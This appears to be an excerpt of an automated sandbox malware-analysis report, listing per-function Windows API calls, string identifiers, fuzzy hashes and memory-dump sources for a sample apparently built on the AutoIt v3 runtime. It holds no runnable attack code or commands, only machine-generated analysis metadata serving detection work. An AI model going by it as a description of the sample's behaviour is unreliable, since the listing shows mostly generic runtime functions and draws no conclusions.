                            • SendMessageW.USER32(?,00000412,00000000), ref: 000E77EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                            • String ID: ($0$tooltips_class32
                            • API String ID: 698492251-4156429822
                            • Opcode ID: 149b992f67937c7a0b4b34b954624b574cecaaddb39c159efdd002eaec520ddc
                            • Instruction ID: 5d133f6b86915c1f76551a67e0392011915730f69e442b0138d1b2f584f9adc1
                            • Opcode Fuzzy Hash: 149b992f67937c7a0b4b34b954624b574cecaaddb39c159efdd002eaec520ddc
                            • Instruction Fuzzy Hash: A3B1AD71608740AFDB54DF69C848B6ABBE5FF88310F00891DF59DAB292DB71E844CB91
                            Function 000C76DB Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 178COMMON
                            Download Yara Rule
                            APIs
                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 000C76ED
                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000C7713
                            • _wcscpy.LIBCMT ref: 000C7741
                            • _wcscmp.LIBCMT ref: 000C774C
                            • _wcscat.LIBCMT ref: 000C7762
                            • _wcsstr.LIBCMT ref: 000C776D
                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 000C7789
                            • _wcscat.LIBCMT ref: 000C77D2
                            • _wcscat.LIBCMT ref: 000C77D9
                            • _wcsncpy.LIBCMT ref: 000C7804
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                            • API String ID: 699586101-1459072770
                            • Opcode ID: a7746f207812ae8252072f3678dd102554d101c40a1273e0f7609f1855f90ebc
                            • Instruction ID: 9696f04048ff0dfd7a24cc471f2c2e1207f8c2643399be5d5dbb11304ebd3df9
                            • Opcode Fuzzy Hash: a7746f207812ae8252072f3678dd102554d101c40a1273e0f7609f1855f90ebc
                            • Instruction Fuzzy Hash: E241F372944204BAEB05B7B49C47FFF77ACEF16720F00016AF904A6193EB749A41DAA1
                            Function 0009A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A839
                            • GetSystemMetrics.USER32(00000007), ref: 0009A841
                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0009A86C
                            • GetSystemMetrics.USER32(00000008), ref: 0009A874
                            • GetSystemMetrics.USER32(00000004), ref: 0009A899
                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0009A8B6
                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0009A8C6
                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0009A8F9
                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0009A90D
                            • GetClientRect.USER32(00000000,000000FF), ref: 0009A92B
                            • GetStockObject.GDI32(00000011), ref: 0009A947
                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0009A952
                              • Part of subcall function 0009B736: GetCursorPos.USER32(000000FF), ref: 0009B749
                              • Part of subcall function 0009B736: ScreenToClient.USER32(00000000,000000FF), ref: 0009B766
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000001), ref: 0009B78B
                              • Part of subcall function 0009B736: GetAsyncKeyState.USER32(00000002), ref: 0009B799
                            • SetTimer.USER32(00000000,00000000,00000028,0009ACEE), ref: 0009A979
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                            • String ID: AutoIt v3 GUI
                            • API String ID: 1458621304-248962490
                            • Opcode ID: b3005a3fb5c30bee94d47dca2a92c0752871557c40ee47bb9a046cc3ac7f9344
                            • Instruction ID: fd27d1e6798cb832428a962ab53a656d9c8093c25f0e3e32803f9a2195c6ef95
                            • Opcode Fuzzy Hash: b3005a3fb5c30bee94d47dca2a92c0752871557c40ee47bb9a046cc3ac7f9344
                            • Instruction Fuzzy Hash: 77B17A75A0020AAFDF14DFA8DC45BAE7BB4FB09314F104229FA55A76A0DB70D881DB91
                            Function 000E352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                            Download Yara Rule
                            APIs
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000E3626
                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0011DBF0,00000000,?,00000000,?,?), ref: 000E3694
                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 000E36DC
                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 000E3765
                            • RegCloseKey.ADVAPI32(?), ref: 000E3A85
                            • RegCloseKey.ADVAPI32(00000000), ref: 000E3A92
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Close$ConnectCreateRegistryValue
                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                            • API String ID: 536824911-966354055
                            • Opcode ID: 0ed3123452f08a1aae847beaca1ec84e952dc5f438adec1c5879d4c8b4d955e5
                            • Instruction ID: f8048138ad89abdc932c83f8a0830ec4ec342b8e81670ee74f69e9ddc884eb56
                            • Opcode Fuzzy Hash: 0ed3123452f08a1aae847beaca1ec84e952dc5f438adec1c5879d4c8b4d955e5
                            • Instruction Fuzzy Hash: A3027B752006519FCB14EF25C895E6ABBE5FF89720F04845DF88AAB362DB30ED41CB81
                            Function 000E69C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 000E6A52
                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000E6B12
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                            • API String ID: 3974292440-719923060
                            • Opcode ID: 1e428f4a8bc562be06616a03dfd3b12c0f5bf0a89724382e7147f37368f4feae
                            • Instruction ID: 0543664bc84989ddc5d18248be80e54b32cfb0e1310233361bb1489163754dac
                            • Opcode Fuzzy Hash: 1e428f4a8bc562be06616a03dfd3b12c0f5bf0a89724382e7147f37368f4feae
                            • Instruction Fuzzy Hash: 12A18E302043419FCB14EF15D951ABAB3E5FF953A4F148869B8A6AB393DB31EC05CB42
                            Function 000BE69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                            Download Yara Rule
                            APIs
                            • GetClassNameW.USER32(00000008,?,00000400), ref: 000BE6E1
                            • _wcscmp.LIBCMT ref: 000BE6F2
                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 000BE71A
                            • CharUpperBuffW.USER32(?,00000000), ref: 000BE737
                            • _wcscmp.LIBCMT ref: 000BE755
                            • _wcsstr.LIBCMT ref: 000BE766
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000BE79E
                            • _wcscmp.LIBCMT ref: 000BE7AE
                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 000BE7D5
                            • GetClassNameW.USER32(00000018,?,00000400), ref: 000BE81E
                            • _wcscmp.LIBCMT ref: 000BE82E
                            • GetClassNameW.USER32(00000010,?,00000400), ref: 000BE856
                            • GetWindowRect.USER32(00000004,?), ref: 000BE8BF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                            • String ID: @$ThumbnailClass
                            • API String ID: 1788623398-1539354611
                            • Opcode ID: 55e1f9d687264b2473da51d7b27228ed64570a6724d90652fc257337894861de
                            • Instruction ID: 0073a4caa13074035f380edb6c1ff749b555a99dc8245ecf2d3e86819c225ece
                            • Opcode Fuzzy Hash: 55e1f9d687264b2473da51d7b27228ed64570a6724d90652fc257337894861de
                            • Instruction Fuzzy Hash: DA81BE310082859FDB55DF54C885FEA7BE8FF44714F14846AFD899A092DB30DD4ACBA1
                            Function 000BE4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __wcsnicmp
                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                            • API String ID: 1038674560-1810252412
                            • Opcode ID: f122deb9cff61635a508ebe82b5d60b6f233f809160ea59893c7ad4c76060210
                            • Instruction ID: 3e95316cb4fafd8fb50b68e2f96d9f34da5653ffd2a2e3037ef31695801b2b0a
                            • Opcode Fuzzy Hash: f122deb9cff61635a508ebe82b5d60b6f233f809160ea59893c7ad4c76060210
                            • Instruction Fuzzy Hash: 2431BF31A44645AADB24FB60DD13EEE73B56F25B58F200125F581B10D7FF61AF04C661
                            Function 000BF898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • LoadIconW.USER32(00000063), ref: 000BF8AB
                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000BF8BD
                            • SetWindowTextW.USER32(?,?), ref: 000BF8D4
                            • GetDlgItem.USER32(?,000003EA), ref: 000BF8E9
                            • SetWindowTextW.USER32(00000000,?), ref: 000BF8EF
                            • GetDlgItem.USER32(?,000003E9), ref: 000BF8FF
                            • SetWindowTextW.USER32(00000000,?), ref: 000BF905
                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000BF926
                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000BF940
                            • GetWindowRect.USER32(?,?), ref: 000BF949
                            • SetWindowTextW.USER32(?,?), ref: 000BF9B4
                            • GetDesktopWindow.USER32 ref: 000BF9BA
                            • GetWindowRect.USER32(00000000), ref: 000BF9C1
                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000BFA0D
                            • GetClientRect.USER32(?,?), ref: 000BFA1A
                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000BFA3F
                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000BFA6A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                            • String ID:
                            • API String ID: 3869813825-0
                            • Opcode ID: 169a04763fe4ad1c1865fb80a81a89ab92a821ba751d7b320f9789319bc0cda6
                            • Instruction ID: 4687ff9d8cbf7c2a62c32db7936ebe0baa943579ca532e47ecc2005173b28961
                            • Opcode Fuzzy Hash: 169a04763fe4ad1c1865fb80a81a89ab92a821ba751d7b320f9789319bc0cda6
                            • Instruction Fuzzy Hash: 42514E7090070AAFDB209FA8DD89FAEBBF5FF04704F004528E596A39A1D7B5A944CB10
                            Function 000ECC68 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000ECD0B
                            • DestroyWindow.USER32(?,?), ref: 000ECD83
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000ECE04
                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000ECE26
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ECE35
                            • DestroyWindow.USER32(?), ref: 000ECE52
                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00080000,00000000), ref: 000ECE85
                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ECEA4
                            • GetDesktopWindow.USER32 ref: 000ECEB9
                            • GetWindowRect.USER32(00000000), ref: 000ECEC0
                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000ECED2
                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000ECEEA
                              • Part of subcall function 0009B155: GetWindowLongW.USER32(?,000000EB), ref: 0009B166
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                            • String ID: 0$tooltips_class32
                            • API String ID: 1297703922-3619404913
                            • Opcode ID: 74ad5feafb32068e77aa77f085cd288568eeeff8efc36320f8edcf7f0d2585ec
                            • Instruction ID: 7dd5f8135114a2b273c949caacba0ae26f5ec8ea9ddd5c56cc38b68a1da99c00
                            • Opcode Fuzzy Hash: 74ad5feafb32068e77aa77f085cd288568eeeff8efc36320f8edcf7f0d2585ec
                            • Instruction Fuzzy Hash: 3871AA75240389AFE724CF28DC45FAA3BE5FB89704F44051CF985A76A1D772E842CB11
                            Function 000EF122 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0009AF8E
                            • DragQueryPoint.SHELL32(?,?), ref: 000EF14B
                              • Part of subcall function 000ED5EE: ClientToScreen.USER32(?,?), ref: 000ED617
                              • Part of subcall function 000ED5EE: GetWindowRect.USER32(?,?), ref: 000ED68D
                              • Part of subcall function 000ED5EE: PtInRect.USER32(?,?,000EEB2C), ref: 000ED69D
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF1B4
                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000EF1BF
                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000EF1E2
                            • _wcscat.LIBCMT ref: 000EF212
                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 000EF229
                            • SendMessageW.USER32(?,000000B0,?,?), ref: 000EF242
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF259
                            • SendMessageW.USER32(?,000000B1,?,?), ref: 000EF27B
                            • DragFinish.SHELL32(?), ref: 000EF282
                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000EF36D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                            • API String ID: 169749273-3440237614
                            • Opcode ID: 00a12132c12cab7cdcfcbc804ebc3fb30a54fc0c4bcb7666ff32ad87a3022b68
                            • Instruction ID: dcd904a95d63f750493f23434553616ef09ff48e5a5538895872fd2d51ee7cad
                            • Opcode Fuzzy Hash: 00a12132c12cab7cdcfcbc804ebc3fb30a54fc0c4bcb7666ff32ad87a3022b68
                            • Instruction Fuzzy Hash: CF614A71108301AFC710EF64DC85DABBBF8FF89710F000A2DF595921A2DB709A45CB62
                            Function 000CB428 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 350timeCOMMON
                            Download Yara Rule
                            APIs
                            • VariantInit.OLEAUT32(00000000), ref: 000CB46D
                            • VariantCopy.OLEAUT32(?,?), ref: 000CB476
                            • VariantClear.OLEAUT32(?), ref: 000CB482
                            • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000CB561
                            • __swprintf.LIBCMT ref: 000CB591
                            • VarR8FromDec.OLEAUT32(?,?), ref: 000CB5BD
                            • VariantInit.OLEAUT32(?), ref: 000CB63F
                            • SysFreeString.OLEAUT32(00000016), ref: 000CB6D1
                            • VariantClear.OLEAUT32(?), ref: 000CB727
                            • VariantClear.OLEAUT32(?), ref: 000CB736
                            • VariantInit.OLEAUT32(00000000), ref: 000CB772
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                            • String ID: %4d%02d%02d%02d%02d%02d$Default
                            • API String ID: 3730832054-3931177956
                            • Opcode ID: 5fe2236157de5afeaf5ed01fc5bb83395317afc2d1007fe53b2d49c1b540adf7
                            • Instruction ID: 96af5e68afce0d9b3dd009545c03f6c167b93a4dbfc34dedc0de0af89ae9fb07
                            • Opcode Fuzzy Hash: 5fe2236157de5afeaf5ed01fc5bb83395317afc2d1007fe53b2d49c1b540adf7
                            • Instruction Fuzzy Hash: B5C1F331A08615EBCB24DFA5D486FAEB7F9FF05300F188469E4459B592CB74EC80DBA1
                            Function 000E6F67 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?), ref: 000E6FF9
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000E7044
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharMessageSendUpper
                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                            • API String ID: 3974292440-4258414348
                            • Opcode ID: 771b145f22af9b0437763f7f4dcdb8da3afafefc8515f3a6d3e589a8cfe0d9f7
                            • Instruction ID: 0b3866cd9b11e8091a9aba65598be46488f359aa694dce2c9b295953a3646839
                            • Opcode Fuzzy Hash: 771b145f22af9b0437763f7f4dcdb8da3afafefc8515f3a6d3e589a8cfe0d9f7
                            • Instruction Fuzzy Hash: B69161342087029FCB18EF15C851AAEB7A2AF94350F44886DF8966B393DB31ED46DB41
                            Function 000EE305 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000EE3BB
                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,000EBCBF), ref: 000EE417
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE457
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE49C
                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE4D3
                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,000EBCBF), ref: 000EE4DF
                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EE4EF
                            • DestroyIcon.USER32(?,?,?,?,?,000EBCBF), ref: 000EE4FE
                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000EE51B
                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000EE527
                              • Part of subcall function 000A1BC7: __wcsicmp_l.LIBCMT ref: 000A1C50
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                            • String ID: .dll$.exe$.icl
                            • API String ID: 1212759294-1154884017
                            • Opcode ID: b771a43c5d991d94ee4c9cf6c6827d33fa3db0514f635b74d6629d44f1e07f37
                            • Instruction ID: 5c819a0ddc60bce6ad93d184520e3998ed99674455535b545529cf57ded502bc
                            • Opcode Fuzzy Hash: b771a43c5d991d94ee4c9cf6c6827d33fa3db0514f635b74d6629d44f1e07f37
                            • Instruction Fuzzy Hash: 7161CEB1540698BFEB24DFA5DC46FEE77B8BB08710F104215F955E60D1EBB4AA80C7A0
